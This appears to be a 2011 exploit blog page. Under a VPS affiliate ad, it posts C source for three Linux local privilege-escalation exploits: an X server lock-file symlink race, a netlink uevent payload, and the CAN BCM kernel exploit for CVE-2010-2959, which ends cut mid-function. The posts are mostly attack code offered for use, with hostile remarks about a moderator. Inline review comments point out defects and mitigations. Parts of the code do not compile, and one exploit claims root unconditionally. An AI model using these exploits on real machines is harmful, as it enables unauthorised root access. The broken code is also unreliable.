
VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, i currently have 2 boxes at, and who have the BEST customer support i have ever found!
The company is HostVirtual, an 11-location company, with datacenters now opening in Asia, which have super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net , and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud, limits usage, accordingly…where openvz, does not. This is why, when your looking at your next Openvz box, check howmuch ram and burstable-ram you get..then check even… you will be shocked :>
This companys boxes are all Xeon QuadCore Highend side of town stuff, aweesome highspeed blades,all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers, get 10% off each ‘instance’ wich is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551

[28day or so] Xchmod converted so it runs a chmodded temporary shell at /tmp/sh by default (race condition mod, still in testing, but it does seem to be working..)

Posted on 25th November 2011 in Exploits

Hello fellow hax0rs!
I, the now banished-from-FDlists, am proud to have made it that far :>
Finally theyre scourge of crappage, will not bomb my damn inbox anymore and 0h wait, already les 20 bs emails.
That was best ever move, and, it will hopefully stay alive , coz i hate that fucker arse valdis and his stupid arse nonsense comments, he is a useless sit, really, secunia must be damn real hard up for moderators if they call him ANY kinda expert, he is a googledork: in one, all he does, is when you post topic, he will google it, with mutiple searchengines, and simply spit you the rubbich links he finds, like page 10 crap… wich is usually why it is about 10yrs out of date when he posts the infos :>
His opinions lack alot of substance, coz the fr cannot code, yet is put in charge of somewherer where, ultimately your code speaks for yourself…
Anyhow, here is some pressentz from santa XD !

// xb0rg.c – a modified and shell version of xchmod: gcc xb0rg.c -o xb0rg;chmod +x xb0rg;./xb0rg
// then: ls -l /bin/sh until it appears… then just cd /tmp/sh and ‘whoami’ and enjoy!

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>

#define XORG_BIN     "/usr/bin/X"
#define DISPLAY      ":1"

/*
 * Read the link target of /proc/self/fd/4 into a local buffer and return a
 * pointer just past the first "tty" substring in it, or NULL when there is
 * none.  The readlink() result is not checked: an absent or unreadable fd 4
 * leaves the buffer all-zero and the function returns NULL; a target of 128
 * bytes or more leaves the buffer without a NUL terminator.
 *
 * Review note: the returned pointer aliases the local array tty_name, which
 * no longer exists once the function returns.  main() only tests the result
 * for NULL, so it is never dereferenced here, but it must not be.
 */
char *get_tty_number(void) {
char tty_name[128], *ptr;
memset(tty_name, '\0', sizeof(tty_name));
readlink("/proc/self/fd/4", tty_name, sizeof(tty_name));  // this seems to always be free..
if ((ptr = strstr(tty_name, "tty")))
return ptr + 3;   // pointer into a stack buffer that is about to go out of scope
return NULL;
}

/*
 * fork() and, in the child, close stdout/stderr and execve() XORG_BIN with
 * argv {XORG_BIN, DISPLAY} and an empty environment; the child _exit()s if
 * the exec returns.  The parent gets the child's pid.  A fork() failure is
 * not detected: -1 != 0, so -1 is simply returned to the caller, which
 * later passes it to kill().
 */
int launch_xorg_instance(void) {
int child_pid;
char *opt[] = { XORG_BIN, DISPLAY, NULL };
if ((child_pid = fork()) == 0) {
close(1);   // silence the server; stdin is left open
close(2);
execve(XORG_BIN, opt, NULL);
_exit(0);   // only reached when execve() fails
}
return child_pid;
}

/*
 * Run "ls -l <file>" through system() after a successful run of main().
 *
 * Review notes: `cmd2` and `cmd3` are used but never declared in this
 * function (or anywhere on this page), so the file does not compile as
 * shown; sprintf(cmd2, "su -", file) passes an argument for which the
 * format has no conversion; and `file` is interpolated into a shell command
 * line unquoted, so any shell metacharacters in the path are interpreted.
 */
void show_target_file(char *file) {
char cmd[524];
memset(cmd, '\0', sizeof(cmd));
sprintf(cmd, "ls -l %s", file);   // file is unquoted in the shell command
memset(cmd2, '\0', sizeof(cmd2));  // cmd2 is undeclared
sprintf(cmd2, "su -", file);       // extra argument, no conversion in the format
system(cmd);
system(cmd2);
system(cmd3);                      // cmd3 is undeclared
}

/*
 * Entry point.  argv[1] (default "/tmp/sh") is the path whose mode the
 * program tries to change through the X server lock-file race.  As written:
 *   1. Build the lock-file names for DISPLAY ":1" ("/tmp/.X1-lock" and
 *      "/tmp/.tX1-lock"), give up if the lock file already exists, and
 *      plant a symlink from it to "/dontexist".
 *   2. Up to 800 times: start an X server (launch_xorg_instance), poll up
 *      to 10000 times for the temporary lock file to appear, SIGSTOP the
 *      server as soon as it does, and leave the loop only when that file
 *      lacks the other-read bit; otherwise start another server, sleep 2s
 *      and SIGKILL the stopped one.
 *   3. Start one more server, replace the temporary lock file with a
 *      symlink to target_file, SIGCONT the stopped server and, after 30ms,
 *      test whether target_file now carries the other-read bit; on success
 *      unlink the lock file, run show_target_file and chdir to /tmp/sh.
 *
 * Review notes (defects visible in this function, left as-is):
 *   - `vv` is declared int but passed to memset()/sprintf() as a buffer,
 *     and `file` is not declared anywhere, so this does not compile.
 *   - strcpy() of argv[1] into target_file[128] is unbounded.
 *   - setuid(0)/setgid(0), symlink(), kill() and the final stat() of
 *     target_file have unchecked results; if target_file does not exist,
 *     `st` still holds the previous stat() result when its mode is tested.
 *   - The servers started on the retry path and before step 3 are never
 *     reaped or killed.
 *   - The technique depends on a privileged X server following a symlink
 *     in a world-writable directory; symlink restrictions on such
 *     directories (e.g. fs.protected_symlinks) address that class of bug.
 */
int main(int argc, char **argv) {
pid_t proc;
struct stat st;
int n, ret, vv, current_attempt = 800;   // vv is an int here but is used as a char buffer below
char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
if (argc < 2)
strcpy(target_file, "/tmp/sh");
else
strcpy(target_file, argv[1]);   // unbounded copy into a 128-byte buffer
sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);     // DISPLAY+1 skips the leading ':'
sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
if (stat(lockfile, &st) == 0) {
return 1;   // lock file for DISPLAY already present
}
symlink("/dontexist", lockfile);
memset(vv, '\0', sizeof(vv));          // does not compile: vv is not a pointer
sprintf(vv, "chmod 4755 %s", file);    // does not compile: `file` is undeclared
setuid(0);
setgid(0); // backup - failover
umask(077);
ttyno = get_tty_number();   // only consulted for the failure hint below
while (--current_attempt) {
proc = launch_xorg_instance();
n = 0;
while (n++ < 10000)
if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)   // busy-poll for the temporary lock file
break;
if (ret == 0) {
syscall(SYS_kill, proc, SIGSTOP);   // freeze the server while it holds the temporary file
stat(lockfiletmp, &st);             // result unchecked
if ((st.st_mode & 4) == 0)          // 4 == S_IROTH: keep this stopped server if the file is not world-readable
break;
launch_xorg_instance();             // return value dropped; this child is never reaped
sleep(2);
}
kill(proc, SIGKILL);
}
if (current_attempt == 0) {
printf("[-] Attack failed!\n");
if (!ttyno)
printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
return 1;
}
launch_xorg_instance();   // return value dropped
sleep(2);
if (stat(lockfiletmp, &st) == 0) {
return 1;   // temporary lock file still present, nowhere to place the symlink
}
printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
symlink(target_file, lockfiletmp);   // result unchecked
printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
kill(proc, SIGCONT);
usleep(30000);
stat(target_file, &st);   // result unchecked; st is stale if target_file is missing
if (!(st.st_mode & 004)) {
printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
return 1;
}
unlink(lockfile);
printf("[+] Attack worked: ls -l %s:\n", target_file);
show_target_file(target_file);
chdir("/tmp/sh");   // cd to our shell..
return 0;
}

Now it is ok and still being played with on different distros, as the universal bzip2 bug still is… they're race conditions which must have some failsafes to get the job done faster, i.e. cron.
cheers,
xd–

[100Day-(or-so)] NETLINK (Audit/Lftp_home)local root exploit #2

Posted on 25th November 2011 in Exploits

Netlink AUDIT localroot exploit
NETLINK / LFTP_HOME/LD_AUDIT BUG made from PoC and code for the netlink bug!
AWESOME PF_NETLINK 0verflow mixed with a local LFTP_HOME or LD_AUDIT could be replaced… for the payload etc..

Anyhow, have fun!

xd– / #Haxnet / #Haxshells free shells service (IPv6 all vhosts are m1n3 b4b1 !

/* netlink-lftp_home bug */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

/* File-scope state used by main(): the netlink socket, the address it is
 * bound to (the same struct is also the sendmsg() destination), the message
 * header and its single iovec.  `sz` is assigned here but never read. */
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

/*
 * Entry point (no return type: implicit int, which C99 and later reject).
 * Builds a uevent-style datagram — "add@/dev/foo" followed by NUL-separated
 * ACTION/DEVPATH/MAJOR/MINOR/SUBSYSTEM fields plus an extra
 * "LFTP_HOME=$ORIGIN exec /proc/self/fd/3" entry — binds a
 * NETLINK_KOBJECT_UEVENT socket to nl_pid = atoi(argv[1]), sends the
 * datagram to that same address, waits 2 s, then calls setuid(0)/setgid(0)
 * and execs /bin/sh.  Whether any receiver honours a uevent from a
 * user-space sender, and what it does with LFTP_HOME, is outside this
 * program; the "Got root" message is printed unconditionally.
 *
 * Review notes: argv[1] is dereferenced without checking argc; socket(),
 * bind(), sendmsg() and setuid() results are ignored; `buf`/`buflen` are
 * assigned but never used.  On the receiving side, uevent consumers that
 * verify the sender is the kernel (nl_pid 0) discard messages like this
 * one, which is the defensive check that matters here.
 */
main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
        char message[LONG_STRING];
        char *mp;
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);   // no argc check: NULL dereference when argv[1] is absent
        address.nl_groups = 0;
        msg.msg_name = (void*)&address;   // destination is the same address the socket binds to
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
        printf("-> PiD: %s\n",argv[1]);
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);   // result unchecked
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));       // result unchecked
        mp = message;
        // each field is appended together with its NUL terminator (+1), uevent style
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LFTP_HOME=$ORIGIN exec /proc/self/fd/3") +1;
        printf("-> Writing payload ..\n");
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);   // total bytes written, terminators included
        char *buf;     // assigned below but never used
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
        printf("-> Sending payload ..");
        sendmsg(socket_fd, &msg, 0);   // result unchecked
        close(socket_fd);
        sleep(2);
        printf("-> Got root, setting up shell ..");   // printed regardless of outcome
        setuid(0);
        setgid(0);
        execl("/bin/sh", "/bin/sh", (void*)0);
}

[OLD] i-can-haz-MODHARDEN.c ~ PF_CAN – Modified/Working version by Admins@CrazyCoders

Posted on 24th November 2011 in Exploits

Now, this is interesting because… I found the older version ok; now, with qurter-nelson.c, it seems that it is very simple and easy to trigger ONLY the bad code in the stack buffer overflow in the kernel.. now with this method we have a method which is made to specially ONLY work on Ubuntu!
That's the kernel_sym lookup bit.. so, I decided to search for a working version and voilà!
I found it, albeit I had to modify it and add in a header… still, it now seems to be working GOOD on Ubuntu and more!

Have a gig …

/*
* i-CAN-haz-MODHARDEN+fixed-syms.c
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit +getsymbols fix
*
* Info:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/utsname.h>

//#define PAGE_SIZE getpagesize()

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif
#ifndef CAN_BCM
#define CAN_BCM 2
#endif

/* Local copies of the CAN socket ABI (sockaddr_can, can_frame and the BCM
 * message header) so the file builds without the kernel's CAN headers.
 * Field order and sizes have to match the kernel's own definitions for the
 * send() calls in trigger() to be parsed as intended — presumably copied
 * from the headers of the era; confirm against the target kernel. */
struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct {
uint32_t rx_id, tx_id;
} tp;
} can_addr;
};
/* One CAN frame: 32-bit id, data length code, eight data bytes aligned to 8. */
struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};
/* BCM message header.  `frames[0]` is a GNU zero-length trailing array (the
 * C99 spelling is `frames[]`).  `nframes` is the field trigger() sets to a
 * value whose product with CFSIZ wraps (CVE-2010-2959, see the file header). */
struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};
#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

/* User-space mirrors of kernel structures.  The global instances declared
 * with them (super_block, inode, dentry, op, vfsmount, file, shmid_kernel)
 * are filled in setup(); shmid_kernel is then copied into the overwrite
 * buffer in trigger(), and the other objects are reached through the
 * pointers it carries.  The layouts are hard-coded and only line up for the
 * kernel build they were taken from, which the file does not name. */
struct list_head {
struct list_head *next;
struct list_head *prev;
};
/* Mirror of the kernel super_block prefix; only s_flags is set in setup(). */
struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;
/* Mirror of the kernel mutex; setup() sets inode.inotify_mutex.count = 1. */
struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};
/* Mirror of the kernel inode; setup() fills i_size, i_sb, the self-linked
 * inotify_watches list and inotify_mutex. */
struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;
/* Mirror of the kernel dentry prefix; d_inode points at the fake inode. */
struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;
/* Mirror of the kernel file_operations table; setup() points both mmap and
 * get_unmapped_area at kernel_code, every other slot stays NULL. */
struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;
/* Mirror of the kernel vfsmount; only mnt_flags and mnt_count are set. */
struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;
/* Mirror of the kernel file prefix: self-linked fu_list, then the fake
 * vfsmount, dentry and file_operations. */
struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;
/* Mirror of the kernel IPC permission block embedded in shmid_kernel. */
struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};
/* Mirror of the kernel shmid_kernel: this is the object image trigger()
 * writes over the corrupted slab object; shm_file points at the fake file. */
struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

/* Function-pointer types for the two kernel routines resolved by name in
 * setup() (regparm(3): register calling convention, i.e. 32-bit x86 only).
 * Both pointers stay NULL if get_symbol() fails, and setup() does not stop
 * in that case. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
/* Payload the kernel is meant to call through the forged file_operations
 * (op.mmap / op.get_unmapped_area, set in setup()).  Calls
 * commit_creds(prepare_kernel_cred(0)) via the resolved addresses and
 * returns -1 so the kernel caller fails.  Parameters are unused. */
int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma) {
commit_creds(prepare_kernel_cred(0));
return -1;
}

/*
 * Resolve a kernel symbol name to its address.  Scans /proc/kallsyms
 * ("%p %c %s" lines) or, when that is missing, /proc/ksyms in "oldstyle"
 * ("%p %s") with "_O/" and "_S." entries skipped and a trailing "_smp…"
 * module suffix cut off; if neither file opens, or the name is not found,
 * it falls back to /boot/System.map-<uname release> (rep == 1).  Returns
 * the address, or 0 when nothing could be opened or the name is absent on
 * the System.map pass.
 *
 * Review notes: fscanf("%s") into sname[512] is unbounded; "%p" stores into
 * an unsigned long through a void ** cast; the uname() result is unchecked.
 * Restricting /proc/kallsyms (kernel.kptr_restrict) and /boot to root
 * defeats this lookup — setup() then gets 0 back and prints its
 * "Symbol table not availabe" message.
 */
unsigned long get_symbol(char *name) { /* borrowed from one of the other codes which actually determines the OS */
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;        // 1 while scanning System.map
int oldstyle = 0;   // 1 for the /proc/ksyms line format
f = fopen("/proc/kallsyms","r");
if (f == NULL) {
f = fopen("/proc/ksyms","r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,sname);   // unbounded %s
else {
ret = fscanf(f, "%p %s\n", (void **)&addr,sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {   // strip a "_smp…" module suffix
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n",sname);   // skip a line that did not match the expected format
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to: %p%s ..\n", name,(void *)addr,rep?"(via System.map)":"");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;   // already on the System.map pass: give up
fallback:
uname(&ver);   // result unchecked
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release); // this helps :P
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}

/*
 * Look up `cache` in /proc/slabinfo and return total - active objects for
 * it, optionally storing the two counts through active_out/total_out.  The
 * header line is read and discarded, then lines are read until the first
 * column equals `cache`.
 *
 * Review notes: the process exits if /proc/slabinfo cannot be opened (on
 * many systems it is readable only by root); if the cache name never
 * appears, fgets() at EOF leaves `slab` unchanged and the loop never ends;
 * "%u" is paired with int*; fgets()/sscanf() results are unchecked, so
 * active/total may be uninitialized when returned.
 */
int check_slabinfo(char *cache, int *active_out, int *total_out) {
FILE *fp;
char name[64], slab[256];
int active, total, diff;
memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));
fp = fopen("/proc/slabinfo", "r");
if (!fp) {
printf("[-] Sorry, /proc/slabinfo is not available!");
exit(1);
}
fgets(slab, sizeof(slab) - 1, fp);   // discard the header line
while (1) {
fgets(slab, sizeof(slab) - 1, fp);   // unchecked: at EOF `slab` keeps its previous contents
sscanf(slab, "%s %u %u", name, &active, &total);   // %u with int*
diff = total - active;
if (strcmp(name, cache) == 0) {
break;   // the only exit from this loop
}
}
fclose(fp);
if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

/*
 * Drive CVE-2010-2959 (see the file header).  Steps, following the printed
 * progress messages:
 *   1. Open and connect a PF_CAN/CAN_BCM datagram socket.
 *   2. Build a bcm_msg_head whose nframes is (UINT_MAX / CFSIZ) + a few, so
 *      that nframes * CFSIZ presumably wraps to a small size; send it once
 *      as RX_DELETE, and delete the caller's SysV shm segments via a shell
 *      loop run by system().
 *   3. Fill the SLUB cache named by SLUB with shmget() segments until
 *      check_slabinfo() reports no free objects, then send the wrapped
 *      header as RX_SETUP (the truncated allocation) with FILLER more
 *      segments allocated on either side of it.
 *   4. mmap() an anonymous region shorter than the length the kernel will
 *      try to copy so the copy from user space faults part-way (EFAULT is
 *      the expected outcome) — first with a zeroed header, then with the
 *      prepared shmid_kernel image placed at MHSIZ + ALLOCATION*2 +
 *      HDRLEN_KMALLOC.
 *   5. Find the segment whose shmat() now fails with EIDRM; if, after the
 *      second overwrite, shmat() of that segment fails with a different
 *      errno, assume the kernel_code payload ran and exec a shell.
 *
 * Review notes (visible defects, left as-is):
 *   - After connect() the test is `if (sock < 0)` instead of `ret < 0`, so
 *     a failed connect is never detected.
 *   - malloc()/mmap() results are unchecked, and `shmids` holds diff*10
 *     ints while the fill loops index up to base + 2*FILLER, which can run
 *     past the end of that array.
 *   - shmat() returns a pointer; the (int) cast only keeps the -1 test
 *     working by truncation.
 *   - The system() call removes every shm segment visible to the user, a
 *     host-wide side effect.
 *   - The fix is the upstream kernel change noted in the header
 *     (>= 2.6.36-rc1); where CAN is not already loaded, preventing
 *     unprivileged socket() calls from autoloading the CAN modules (the
 *     "MODHARDEN" idea in the title) removes the trigger as well.
 */
void trigger(void) {
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;
printf("[+] Creating PF_CAN UDP socket ..\n");
sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf("[-] Kernel lacks CAN packet family support!\n");
exit(1);
}
printf("[+] Connecting PF_CAN socket ..\n");
memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;
ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) {   // tests the wrong variable: `ret` holds the connect() result
printf("[-] Couldnt connect CAN socket ..\n");
exit(1);
}
len = MHSIZ + (CFSIZ * (ALLOCATION/16));
msg = malloc(len);   // unchecked
memset(msg, 0, len);
msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;   // chosen so nframes * CFSIZ wraps
printf("[+] Clearing out any active OPs via RX_DELETE ..\n");
msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);
printf("[+] Removing any active user owned shmids ..\n");
system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid >/dev/null 2>&1; done;");   // deletes every segment the user can see
printf("[+] Massaging " SLUB " SLUB cache with dummy allocations ..\n");
diff = check_slabinfo(SLUB, &active, &total);
shmids = malloc(sizeof(int) * diff * 10);   // unchecked; sized before the loops below are known to fit
cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;   // no free objects left in the cache
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;
if (diff != 0) {
printf("[-] Inconsistency detected with SLUB cache allocation!\n");
exit(1);
}
printf("[+] Corrupting BCM OP with truncated allocation via RX_SETUP ..\n");
i = base;
cnt = i + FILLER;   // indices base .. base+FILLER-1 may exceed the diff*10 allocation
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf("[-] Kernel rejected malformed CAN header ..\n");
exit(1);
}
i = base + FILLER;
cnt = i + FILLER;   // indices up to base+2*FILLER-1
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
printf("[+] Mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec ..\n");
mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);   // assigned but not used below
efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);   // unchecked
//efault = mmap(PAGE_SIZE, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
printf("[+] Mmap'ed mapping of length: %d at: %p ..\n", mmap_len, efault);
printf("[+] Smashing adjacent shmid with dummy payload via malformed RX_SETUP ..\n");
msg = (struct bcm_msg_head *) efault;
memset(msg, 0, mmap_len);
msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;   // more frames than the mapping holds: the copy is expected to fault
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldnt trigger EFAULT ,aborting!\n");
exit(1);
}
printf("[+] Seeking out the smashed shmid_kernel ..\n");
i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) {
ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);   // pointer truncated to int
if (ret == -1 && errno == EIDRM) {
smashed = i;
break;
}
}
if (i == cnt) {
printf("[-] Couldnt find smashed shmid!\n");
exit(1);
}
printf("[+] Discovered our smashed shmid_kernel at: shmid[%d] = %d ..\n", i, shmids[i]);
printf("[+] Re-smashing the shmid_kernel with exploit payload ..\n");
shmid_kernel.shm_perm.seq = shmids[smashed]/IPCMNI;   // seq so the forged object still matches the id
buf = (char *) msg;
memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldn't trigger EFAULT ,aborting!\n");
exit(1);
}
ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {   // any failure other than EIDRM is taken as "payload ran"
setresuid(0, 0, 0);
